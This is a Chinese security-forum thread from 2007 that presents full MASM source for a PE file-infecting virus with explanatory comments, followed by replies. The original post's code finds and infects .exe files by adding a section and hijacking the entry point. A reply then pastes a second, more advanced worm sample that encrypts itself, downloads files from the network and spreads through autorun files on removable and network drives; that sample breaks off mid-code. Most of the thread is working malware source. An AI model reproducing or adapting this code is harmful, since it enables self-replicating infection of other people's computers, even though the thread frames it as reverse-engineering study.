[分享]一个病毒源码的分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[分享]一个病毒源码的分析

发表于: 2007-11-27 12:25 32545

[分享]一个病毒源码的分析

combojiang 活跃值

2007-11-27 12:25

32545

.586
.model flat, stdcall
option casemap : none ; 区分大小写

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\gdi32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib

.data ; 寄主程序要用到的数据
MsgTitle db "Caution!", 0h
Msg db "VirusZ OK!", 0h

.code
;==========================================>>宿主程序
main_start:
push MB_OK
push offset MsgTitle
push offset Msg
push NULL
call MessageBox
push 0h
call ExitProcess
; 这个寄主程序很简单，就不需要解释了吧。：）
;==========================================<<寄主程序结束

VirusZ segment
;==========================================>>病毒代码
virus_start:
call get_offset
get_offset:
pop ebp
sub ebp, offset get_offset
; 取得偏移值，以后所有数据都要加上这个偏移。
; 这个偏移是怎么取得的呢？call get_offset将get_offset的地址压入堆栈，然后用pop ebp把地址值放到ebp中，; 再用原来的get_offset地址减去它，就拿到了原地址和当前地址的偏移。

cmp Ori_Entry[ebp], 0h
jnz save_entry
mov Ori_Entry[ebp], 401000h
; 什么情况下Ori_Entry[ebp]中的值会是0h呢？只有在运行现在这个程序的时候。在后面的代码中可以看到，在传染时，被感染的EXE中Ori_Entry[ebp]都被填入了原入口地址，所以只有这个程序在执行时Ori_Entry[ebp] 中为0h。

save_entry:
push Ori_Entry[ebp]
pop Ret_Entry[ebp]
; 因为Ori_Entry[ebp]在后面写入EXE时要改为其他的值，所以，先把本次运行的入口地址保存起来，之后跳转使用。

lea eax, FindData[ebp]
push eax
lea eax, FindFile[ebp]
push eax
call ZFindFirstFile ; 查找第一个文件
; 每一个API的调用都在前面加上了一个Z，声明在后面的调用函数部分。
cmp eax, INVALID_HANDLE_VALUE
jz end_find ; 查找完毕
mov FindHandle[ebp], eax
call infect_file ; 感染文件

find_next:
lea eax, FindData[ebp]
push eax
push FindHandle[ebp]
call ZFindNextFile ; 查找下一个文件
cmp eax, FALSE
jz end_find ; 查找完毕
call infect_file ; 感染文件
jmp find_next

infect_file:
; 下面开始是感染判断及感染过程。
push 0h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0h
push FILE_SHARE_READ + FILE_SHARE_WRITE
push GENERIC_READ + GENERIC_WRITE
lea eax, FindData[ebp].cFileName
push eax
call ZCreateFile ; 打开文件
cmp eax, INVALID_HANDLE_VALUE
jz create_err
mov OpenHandle[ebp], eax

push FILE_BEGIN
push 0h
push 3ch
push OpenHandle[ebp]
call ZSetFilePointer ; 指向文件3ch处
; 从文件开始数起的3ch处是MZ Header中记录的PE头的偏移。

push 0h
lea eax, ReadCount[ebp]
push eax
push 4h
lea eax, PEAddress[ebp]
push eax
push OpenHandle[ebp]
call ZReadFile ; 读取PE头偏移
cmp eax, 0h
jz read_err

push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ; 指向PE头开始处

mov HeadLength[ebp], sizeof PEHead + sizeof SectionTable
; HeadLength[ebp]中是PE头和节表的长度和。
push 0h
lea eax, ReadCount[ebp]
push eax
push HeadLength[ebp]
lea eax, PEHead[ebp]
push eax
push OpenHandle[ebp]
call ZReadFile ; 读取PE头和节表
cmp eax, 0h
jz read_err

cmp DWORD ptr PEHead[ebp].Signature, IMAGE_NT_SIGNATURE ; 是否PE格式
; IMAGE_NT_SIGNATURE应为"PE\0\0"。
jnz end_modify

cmp WORD ptr PEHead[ebp + 1ah], 0C05h ; 是否已经感染
; PEHead[ebp + 1ah]处的值代表的是该程序的Linker的版本，在MASM32 V8.0中版本为0C05h，而绝大多数程序，这个值是不相等的，所以用来判断是否感染。
jz end_modify

; 下面是感染EXE的代码
mov eax, PEHead[ebp].OptionalHeader.AddressOfEntryPoint
; PEHead[ebp].OptionalHeader.AddressOfEntryPoin是程序入口地址的RVA。
add eax, PEHead[ebp].OptionalHeader.ImageBase
; PEHead[ebp].OptionalHeader.ImageBase是程序载入内存的基地址。
; 两个值相加得到程序入口的实际地址。
mov Ori_Entry[ebp], eax ; 保存原程序入口点

mov eax, sizeof PEHead
mov SectionAddress[ebp], eax ; 节表开始地址
mov VirusLength[ebp], offset virus_end - offset virus_start ; 病毒长度

movzx eax, PEHead[ebp].FileHeader.NumberOfSections ; 节的个数
inc eax
mov ecx, 28h
; 节表中每个节定义占28h。
mul ecx ; eax = eax * ecx
add eax, SectionAddress[ebp]
add eax, PEAddress[ebp]
cmp eax, PEHead[ebp].OptionalHeader.SizeOfHeaders ; 看是否还能插入一个节
ja end_modify

lea edi, SectionTable[ebp]
movzx eax, PEHead[ebp].FileHeader.NumberOfSections
mov ecx, 28h
mul ecx
; eax中得到节表修改前大小。
add edi, eax
; edi存放添加节的开始地址。
inc PEHead[ebp].FileHeader.NumberOfSections ; 添加一个节

mov eax, [edi - 28h + 8h] ; 前一节长
add eax, [edi - 28h + 0ch] ; 前一节RVA
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ; 节的对齐值
div ecx
inc eax
mul ecx
mov NewSection[ebp].VirtualAddress, eax ; 对齐的新节虚拟地址

mov eax, VirusLength[ebp] ; 病毒长度
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ; 文件的对齐值
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawSize, eax ; 对齐的新节物理大小

mov eax, VirusLength[ebp] ; 病毒长度
mov NewSection[ebp].VirtualSize, eax ; 新节虚拟长度 = 病毒长度

mov eax, [edi - 28h + 14h] ; 前一节物理偏移
add eax, [edi - 28h + 10h] ; 前一节物理长度
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ; 文件的对齐值
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawOffset, eax ; 对齐的新节物理偏移

mov eax, NewSection[ebp].VirtualSize ; 新节虚拟长度
add eax, PEHead[ebp].OptionalHeader.SizeOfImage ; 加上原文件虚拟长度
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ; 节的对齐值
div ecx
inc eax
mul ecx
mov PEHead[ebp].OptionalHeader.SizeOfImage, eax ; 新的文件虚拟长度
; 之前的修改都是在改NewSection[ebp]中的，别忘了拷回节表中。

lea esi, NewSection[ebp]
mov ecx, 28h
rep movsb ; 从NewSection中拷到节表中

mov eax, NewSection[ebp].VirtualAddress
mov PEHead[ebp].OptionalHeader.AddressOfEntryPoint, eax ; 更新程序入口点

mov WORD ptr PEHead[ebp + 1ah], 0C05h ; 加上已感染标志

push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ; 文件指针指向PE头处

push 0h
lea eax, ReadCount[ebp]
push eax
push HeadLength[ebp]
lea eax, PEHead[ebp]
push eax
push OpenHandle[ebp]
call ZWriteFile ; 写入新的PE头
cmp eax, 0h
jz write_err

push FILE_BEGIN
push 0h
push NewSection[ebp].RawOffset
push OpenHandle[ebp]
call ZSetFilePointer ; 指向病毒代码写入处（应该在文件尾）

push 0h
lea eax, ReadCount[ebp]
push eax
push NewSection[ebp].RawSize
lea eax, virus_start[ebp]
push eax
push OpenHandle[ebp]
call ZWriteFile ; 写入病毒代码
cmp eax, 0h
jz write_err

end_modify:
read_err:
write_err:
setpointer_err:
push OpenHandle[ebp]
call ZCloseHandle ; 关闭文件

create_err:

ret
; 感染完毕，ret后继续查找下一个文件。

end_find:
push FindHandle[ebp]
call ZFindClose ; 停止查找

; 此处放置破坏代码（包括破坏条件和破坏内容），不过本病毒用于学习，就不放了。：）

push Ret_Entry[ebp] ; 此处为返回寄主程序的入口地址
ret
; ret从堆栈中取一个值作为跳回的地址，所以，先压入原入口点，再ret就回到了寄主程序入口。

;==========================================<<病毒代码结束

;==========================================>>函数声明
这里的地址都是NT中的对应API地址，如果要改为9X下执行，就把地址值改为9X的。（地址可以用W32DASM得到。）
ZCreateFile:
mov FunctionAddress[ebp], 77e5a837h
jmp FunctionAddress[ebp]

ZSetFilePointer:
mov FunctionAddress[ebp], 77e58c81h
jmp FunctionAddress[ebp]

ZReadFile:
mov FunctionAddress[ebp], 77e58b82h
jmp FunctionAddress[ebp]

ZWriteFile:
mov FunctionAddress[ebp], 77e59d8ch
jmp FunctionAddress[ebp]

ZCloseHandle:
mov FunctionAddress[ebp], 77e57963h
jmp FunctionAddress[ebp]

ZFindFirstFile:
mov FunctionAddress[ebp], 77e55d9eh
jmp FunctionAddress[ebp]

ZFindNextFile:
mov FunctionAddress[ebp], 77e55e67h
jmp FunctionAddress[ebp]

ZFindClose:
mov FunctionAddress[ebp], 77e58eaah
jmp FunctionAddress[ebp]

;==========================================<<函数声明结束

;==========================================>>病毒数据
; 这些都是病毒程序中用到的数据
Ret_Entry dd 0h
Ori_Entry dd 0h
FindFile db "*.exe", 0h
FindData WIN32_FIND_DATA <0>
FindHandle dd 0h
OpenHandle dd 0h
ReadCount dd 0h
PEAddress dd 0h
PEHead IMAGE_NT_HEADERS <0>
SectionTable db 280h dup (0)
HeadLength dd 0h
Sectionaddress dd 0h
VirusLength dd 0h
FunctionAddress dd 0h

VirusZSection struc
      SectionName db "VirusZ", 0h, 0h
      VirtualSize dd 0h
      VirtualAddress dd 0h
      RawSize dd 0h
      RawOffset dd 0h
      dd 0h, 0h, 0h
      SectionFlags dd 0e0000020h
VirusZSection ends

NewSection VirusZSection <>
;==========================================<<病毒数据结束

VirusName db 0h, "VirusZ 1.0 by Zane", 0h ; 版本信息
virus_end:
VirusZ ends
end virus_start ; 从病毒代码入口开始执行

[课程]Android-CTF解题方法汇总！

收藏・32

免费・7

支持

最新回复 (53) 1 2 3 ▶
cham 雪币： 193 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 36 回帖 200 粉丝 0 关注私信	cham 2 楼谢谢楼主，正好想找个入门！ 2007-11-27 12:39 0
kgdurgwu 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 91 粉丝 0 关注私信	kgdurgwu 3 楼收藏了谢谢扫盲。。。。 2007-11-27 13:09 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 4 楼这里＝＝＝》这里的地址都是NT中的对应API地址，如果要改为9X下执行， ……………… 最好判断一下操作系统 2007-11-27 22:13 0
cham 雪币： 193 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 36 回帖 200 粉丝 0 关注私信	cham 5 楼 Sectionaddress dd 0h定义错误啊，应该是SectionAddress 这里的地址都是NT中的对应API地址，如果要改为9X下执行，就把地址值改为9X的。（地址可以用W32DASM得到。）因为是注释，整句前面少了个; 修改后我编译了一下，没错，但是在vbox的虚拟机中运行了一下，出错了！ 2007-11-28 16:37 0
cyto 雪币： 417 活跃值： (475) 能力值： ( LV9，RANK：1250 ) 在线值：发帖 41 回帖 624 粉丝 0 关注私信	cyto 31 6 楼扫盲篇,收藏学习. 2007-11-28 21:14 0
巨蟹之子雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	巨蟹之子 7 楼认真学习了一下~~ 2007-11-29 11:00 0
crazybug 雪币： 22 活跃值： (425) 能力值： ( LV6，RANK：90 ) 在线值：发帖 14 回帖 112 粉丝 0 关注私信	crazybug 2 8 楼汗 API 地址硬编码～最起码来个暴力搜索啊～ 2007-11-30 11:51 0
hfyy 雪币： 235 活跃值： (23) 能力值： ( LV6，RANK：90 ) 在线值：发帖 14 回帖 122 粉丝 2 关注私信	hfyy 2 9 楼硬编码可不是什么好办法搜索挺简单的 2007-12-8 18:13 0
hityct 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	hityct 10 楼入门的好教材。 2007-12-13 10:18 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 11 楼我看还不如直接写死ＡＰＩ地址，兼容性判断以下就好 2007-12-13 13:37 0
黑色猎鹰雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	黑色猎鹰 12 楼收藏学习~~~ 2007-12-19 22:45 0
interfox 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 13 粉丝 0 关注私信	interfox 13 楼谢谢扫盲，入门者的教材，编的初学者 2008-1-26 16:46 0
yjlssg 雪币： 627 活跃值： (1891) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 87 粉丝 0 关注私信	yjlssg 14 楼好，支持一下，还是要学汇编啊 2008-1-27 00:08 0
小子贼野雪币： 347 活跃值： (25) 能力值： ( LV9，RANK：420 ) 在线值：发帖 25 回帖 891 粉丝 0 关注私信	小子贼野 10 15 楼好东西，收藏了 2008-1-27 11:58 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 16 楼一个新样本： .386 .model flat, stdcall option casemap:none include d:\masm32\include\kernel32.inc includelib d:\masm32\lib\kernel32.lib include d:\masm32\include\windows.inc .code main: pushad push @@curAddr jmp @@curAddr embedMain: pushad call @@curAddr @@curAddr: mov ebp, [esp] add esp, 4 sub ebp, @@curAddr - main sub ebp, main lea eax, [ebp + @@beginEnvelopPos] mov ecx, offset ournasdfasdf - offset @@beginEnvelopPos call EnvelopCode lea eax, [ebp + @@beginEnvelopPos] jmp eax ;------------------------------------------------------------------------- EnvelopCode PROC and cx, 0fffcH .WHILE cx xor dword ptr [eax], 'czj1' sub cx, 4 add eax, 4 .ENDW ret EnvelopCode ENDP ;-------------------------------------------------------------------------------- @@beginEnvelopPos: ;-------initialize fun entry-------------- mov esi, [EBP+ OFFSET _dwImageBase] assume esi : ptr IMAGE_DOS_HEADER mov esi, [esi].e_lfanew add esi, [EBP+ OFFSET _dwImageBase] assume esi : ptr IMAGE_NT_HEADERS32 ; push [esi].OptionalHeader.DataDirectory[11 * SIZEOF IMAGE_DATA_DIRECTORY].VirtualAddress ; push [esi].FileHeader.NumberOfSections mov esi, [esi].OptionalHeader.DataDirectory[SIZEOF IMAGE_DATA_DIRECTORY].VirtualAddress ;1 --IMAGE_DIRECTORY_ENTRY_IMPORT add esi, [EBP+ OFFSET _dwImageBase] assume esi : ptr IMAGE_IMPORT_DESCRIPTOR .while !([esi].OriginalFirstThunk==0 && [esi].TimeDateStamp==0 && [esi].ForwarderChain==0 && [esi].Name1==0 && [esi].FirstThunk==0) mov eax,[esi].Name1 ADD eax,[EBP+OFFSET _dwImageBase] ; .IF (dword ptr[edx] == ('NREK') && dword ptr [edx + 4] == ('23LE') && dword ptr [edx + 8] == ('lld.') && byte ptr [edx + 12] == 0) \|\| (dword ptr[edx] == ('nrek') && dword ptr [edx + 4] == ('23le') && dword ptr [edx + 8] == ('lld.') && byte ptr [edx + 12] == 0) add esp, 10H mov edx, esp mov ebx, dword ptr [eax] mov dword ptr [edx], ebx mov ebx, dword ptr [eax + 4] mov dword ptr [edx + 4], ebx mov ebx, dword ptr [eax + 8] mov dword ptr [edx + 8], ebx mov bl, byte ptr [eax + 0cH] mov byte ptr [edx + 0cH], bl push edx call strupw xor eax, eax .IF dword ptr[edx] == ('NREK') && dword ptr [edx + 4] == ('23LE') && dword ptr [edx + 8] == ('LLD.') && byte ptr [edx + 12] == 0 mov eax, 1 .endif sub esp, 10H .IF eax xor eax, eax mov edx, [esi].OriginalFirstThunk .IF edx != 0 add edx, [EBP+OFFSET _dwImageBase] .ENDIF .WHILE edx != 0 && dword ptr [edx] != 0 push edx push eax mov edx, [edx] add edx, [EBP+ OFFSET _dwImageBase] assume edx : ptr IMAGE_IMPORT_BY_NAME ADD edx, SIZEOF WORD .IF dword ptr [edx] == ('PteG') && dword ptr [edx + 4 ] == ('Acor') && dword ptr [edx + 8 ] == ('erdd') && word ptr [edx + 12] == ('ss') && byte ptr [edx + 14] == 0 mov edx, [esi].FirstThunk add edx, [EBP+ OFFSET _dwImageBase] add edx, eax MOV eax, dword ptr [edx] MOV dword ptr [ebp + OFFSET _GetProcAddress], eax .ELSEIF dword ptr [edx] == ('daoL') && dword ptr [edx + 4 ] == ('rbiL') && dword ptr [edx + 8 ] == ('Ayra') && word ptr [edx + 12] == 0 mov edx, [esi].FirstThunk add edx, [EBP+ OFFSET _dwImageBase] add edx, eax MOV eax, dword ptr [edx] MOV dword ptr [ebp + OFFSET _LoadLibraryA], eax .ENDIF pop eax pop edx add edx, 4 add eax, 4 .ENDW .ENDIF add esi,sizeof IMAGE_IMPORT_DESCRIPTOR .ENDW .IF [ebp + _GetProcAddress] == 0 \|\| [ebp + _LoadLibraryA ] == 0 @@GOOUT: .IF [ebp + _dwOrgEntry] == 0 popad ret .ELSEIF lea eax, [ebp + @@orgAddress] add eax, 4 mov ebx, [ebp + _dwOrgEntry] add ebx, [ebp + _dwImageBase] sub ebx, eax mov dword ptr [ebp + @@orgAddress], ebx popad db 0e9h @@orgAddress: dd 0 .ENDIF .ENDIF lea eax, [ebp + szKernel32] push eax call [ebp + _LoadLibraryA] mov [ebp + _dwKernelBase], eax push eax pop ebx lea edx, [ebp + offset _GetModuleHandle] push edx lea edx, [ebp + offset szGetModuleHandle] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _FreeLibrary] push edx lea edx, [ebp + offset szFreeLibrary] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _VirtualProtect] push edx lea edx, [ebp + offset szVirtualProtect] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetModuleFileName] push edx lea edx, [ebp + offset szGetModuleFileName] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateFile] push edx lea edx, [ebp + offset szCreateFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _ReadFile] push edx lea edx, [ebp + offset szReadFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _WriteFile] push edx lea edx, [ebp + offset szWriteFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetFileSize] push edx lea edx, [ebp + offset szGetFileSize] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CloseHandle] push edx lea edx, [ebp + offset szCloseHandle] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateRemoteThread] push edx lea edx, [ebp + offset szCreateRemoteThread] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _VirtualAllocEx] push edx lea edx, [ebp + offset szVirtualAllocEx] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _VirtualFree] push edx lea edx, [ebp + offset szVirtualFree] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _WriteProcessMemory] push edx lea edx, [ebp + offset szWriteProcessMemory] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _OpenProcess] push edx lea edx, [ebp + offset szOpenProcess] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateProcess] push edx lea edx, [ebp + offset szCreateProcess] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _TerminateProcess] push edx lea edx, [ebp + offset szTerminateProcess] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateThread] push edx lea edx, [ebp + offset szCreateThread] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _Sleep] push edx lea edx, [ebp + offset szSleep] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreatePipe] push edx lea edx, [ebp + offset szCreatePipe] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GlobalAlloc] push edx lea edx, [ebp + offset szGlobalAlloc] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GlobalFree] push edx lea edx, [ebp + offset szGlobalFree] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _SetFilePointer] push edx lea edx, [ebp + offset szSetFilePointer] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _FindFirstFile] push edx lea edx, [ebp + offset szFindFirstFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _FindNextFile] push edx lea edx, [ebp + offset szFindNextFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _FindClose] push edx lea edx, [ebp + offset szFindClose] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _WinExec] push edx lea edx, [ebp + offset szWinExec] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetSystemDirectory] push edx lea edx, [ebp + offset szGetSystemDirectory] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetDriveType] push edx lea edx, [ebp + offset szGetDriveType] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _SetFileTime] push edx lea edx, [ebp + offset szSetFileTime] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _SetFileAttributes] push edx lea edx, [ebp + offset szSetFileAttributes] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetFileAttributesEx] push edx lea edx, [ebp + offset szGetFileAttributesEx] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _DeleteFile] push edx lea edx, [ebp + offset szDeleteFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetLastError] push edx lea edx, [ebp + offset szGetLastError] push edx sub esp, 8 call InitFunctionAddress ;-----------ntdll.dll-------------------- lea eax, [ebp + szNtdll] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _NtQuerySystemInformation] push edx lea edx, [ebp + offset szNtQuerySystemInformation] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;---------------Mpr.dll-------------------------- lea eax, [ebp + szMpr] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _WNetOpenEnum] push edx lea edx, [ebp + offset szWNetOpenEnum] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _WNetEnumResource] push edx lea edx, [ebp + offset szWNetEnumResource] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _WNetAddConnection2] push edx lea edx, [ebp + offset szWNetAddConnection2] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _WNetCloseEnum] push edx lea edx, [ebp + offset szWNetCloseEnum] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;-----------urlmon.dll------------------ lea eax, [ebp + szurlmon] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _URLDownloadToFile] push edx lea edx, [ebp + offset szURLDownloadToFile] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;----------------Advapi32.dll------------------ lea eax, [ebp + szAdvapi32] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _OpenSCManager] push edx lea edx, [ebp + offset szOpenSCManager] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _OpenService] push edx lea edx, [ebp + offset szOpenService] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _ControlService] push edx lea edx, [ebp + offset szControlService] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _CloseServiceHandle] push edx lea edx, [ebp + offset szCloseServiceHandle] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _RegOpenKeyEx] push edx lea edx, [ebp + offset szRegOpenKeyEx] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _RegSetValueEx] push edx lea edx, [ebp + offset szRegSetValueEx] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _RegCloseKey] push edx lea edx, [ebp + offset szRegCloseKey] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;-----------user32.dll------------------ lea eax, [ebp + szUser32] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _FindWindowEx] push edx lea edx, [ebp + offset szFindWindowEx] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;---------------initialize end-------------------------- ;-----------remove begin---------- lea edx, [ebp + offset _mm] push edx lea edx, [ebp + offset szmm] push edx sub esp, 8 call InitFunctionAddress ;-----------HOOK API---------------------- ;---------------------------test fun ------------------ call specifyFun ;---------------------------end test fun------------------- ; ---------------remove begin ----------------------------------------------------------------------------- mov edx, offset check@@3 add edx, ebp jmp edx mes3 : db " finish!",0 check@@3: lea edx, [ebp + offset mes3] push [ebp + _mm] push edx call checkPoint ;-----------remove end------------- @@JMPOLDPROC: lea ebx, [ebp + @@GOOUT] jmp ebx ;---------------------------------------------------------------------------------------- InitFunctionAddress proc uses ebx edx , hMod : LPVOID, pGetProcAddress : LPVOID, lpFunName : LPVOID, lpAddress : DWORD mov ebx, lpAddress push lpFunName push hMod call pGetProcAddress mov dword ptr [ebx], eax ret InitFunctionAddress ENDP ;--------------------------------------------------------------------- specifyFun proc .if BYTE PTR [ebp+runPosition] call DownFileFromNet push 0 push 0 push ebp lea ebx, [ebp + LOOPCreateVirusExe] push ebx push 10241024 push 0 call [ebp+_CreateThread] .else push ebp call CreateVirusExe push 0 push 0 push ebp lea ebx, [ebp + LOOPInfectNetFile] push ebx push 10241024 push 0 call [ebp+_CreateThread] @@specifyFun_loop: call shortTimeSelfFun lea eax, [ebp + @@specifyFun_loop] jmp eax .endif ret specifyFun endp ;------------------------------------------------------------------------ LOOPCreateVirusExe PROC push ebp mov ebp, [esp + 8] @@LOOPCreateVirusExe: call InfectfileFun lea eax, [ebp + @@LOOPCreateVirusExe] jmp eax pop ebp ret 4 LOOPCreateVirusExe endp ;------------------------------- CreateVirusExe PROC push ebp mov ebp, [esp + 8] push ebx mov ebx, esp sub esp, 104H mov dword ptr [esp], '\' push ebx lea ebx, [esp + 8] push 100h push ebx call [ebp + _GetSystemDirectory] lea eax, [ebx - 4] push eax push ebx call strcat lea eax, [ebp + virname] push eax push ebx call strcat call CreateVirusExeAndWrite call CheckCurrentExist .if eax push 0 push ebx call [ebp + _WinExec] .if eax <= 31 push 80H push ebx call [ebp + _SetFileAttributes] push ebx call [ebp + _DeleteFile] call CreateVirusExeAndWrite push 0 push ebx call [ebp + _WinExec] .endif .endif pop esp pop ebx pop ebp ret 4 CreateVirusExe endp ;-------------------------------------- CreateVirusExeAndWrite proc push ebx push edx push esi push edi push ecx mov edx, esp mov ecx, offset ournasdfasdf - offset embedMain + 280H + 10H and cl, 0f0h sub esp, ecx mov edi, esp push edx push 0 push 80H push 1 push 0 push 0 push GENERIC_WRITE push ebx call [ebp + _CreateFile] .IF eax == -1 call [ebp + _GetLastError] lea eax, [@@CreateVirusExeAndWrite_out + ebp] jmp eax .ENDIF push eax push dword ptr [ebp + _dwImageBase] push dword ptr [ebp + _dwOrgEntry] push 0 lea ecx, [ebp + tempword] push ecx mov ecx, offset ournasdfasdf - offset embedMain add ecx, 278h push ecx lea esi, [ebp + ournasdfasdf] sub esi, ecx mov edx, ecx mov dword ptr [ebp + _dwImageBase], 400000h mov dword ptr [ebp + _dwOrgEntry], 0 and BYTE PTR [ebp + runPosition], 0 push edi push edi shr ecx, 2 rep movs dword ptr [edi], dword ptr [esi] pop edi push eax mov eax, edi add eax, edx mov ecx, offset ournasdfasdf - offset @@beginEnvelopPos sub eax, ecx call EnvelopCode call [ebp + _WriteFile] pop dword ptr [ebp + _dwOrgEntry] pop dword ptr [ebp + _dwImageBase] or BYTE PTR [ebp + runPosition], 1 call [ebp + _CloseHandle] mov eax, 0 @@CreateVirusExeAndWrite_out: pop esp pop ecx pop edi pop esi pop edx pop ebx ret CreateVirusExeAndWrite endp ;----------------------------------------------------------------------------- wirteautorun PROC push ebx push 80H push ebx call [ebp + _SetFileAttributes] push 0 push 80H push OPEN_ALWAYS push 0 push 0 push GENERIC_WRITE push ebx call [ebp + _CreateFile] .if eax == 0 pop ebx ret .endif push eax mov ebx, eax push 0 lea eax, [ebp + tempword] push eax push offset virdll - offset _autoruncontent - 1 lea eax, [ebp + _autoruncontent] push eax push ebx call [ebp + _WriteFile] call [ebp + _CloseHandle] pop ebx push FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_ARCHIVE push ebx call [ebp + _SetFileAttributes] ret wirteautorun endp movabledisk Proc push ebx push ecx mov ecx, esp sub esp, 20H mov ebx, esp push ecx mov dword ptr [ebx], '\:y' mov cl, byte ptr [ebx] .while cl <= 'z' push ebx call [ebp + _GetDriveType] ;int 3 .if eax == DRIVE_REMOVABLE \|\| eax == DRIVE_REMOTE lea eax, [ebp + virname] push eax push ebx call strcat ;int 3 call CreateVirusExeAndWrite .if eax == 0 push FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_HIDDEN push ebx call [ebp + _SetFileAttributes] mov byte ptr [ebx + 3], 0 lea eax, [ebp + _autorun] push eax push ebx call strcat call wirteautorun .endif .endif inc byte ptr [ebx] mov cl, byte ptr [ebx] .endw pop esp pop ecx pop ebx ret movabledisk endp LOOPInfectNetFile PROC push ebp mov ebp, [esp + 8] @@LOOPInfectNetFile: call longTimeSelfFun lea eax, [ebp + @@LOOPInfectNetFile] jmp eax pop ebp ret 4 LOOPInfectNetFile endp ;------------------------------------- InfectNetFile proc push ebx push ecx mov ebx, esp sub esp, 32 mov 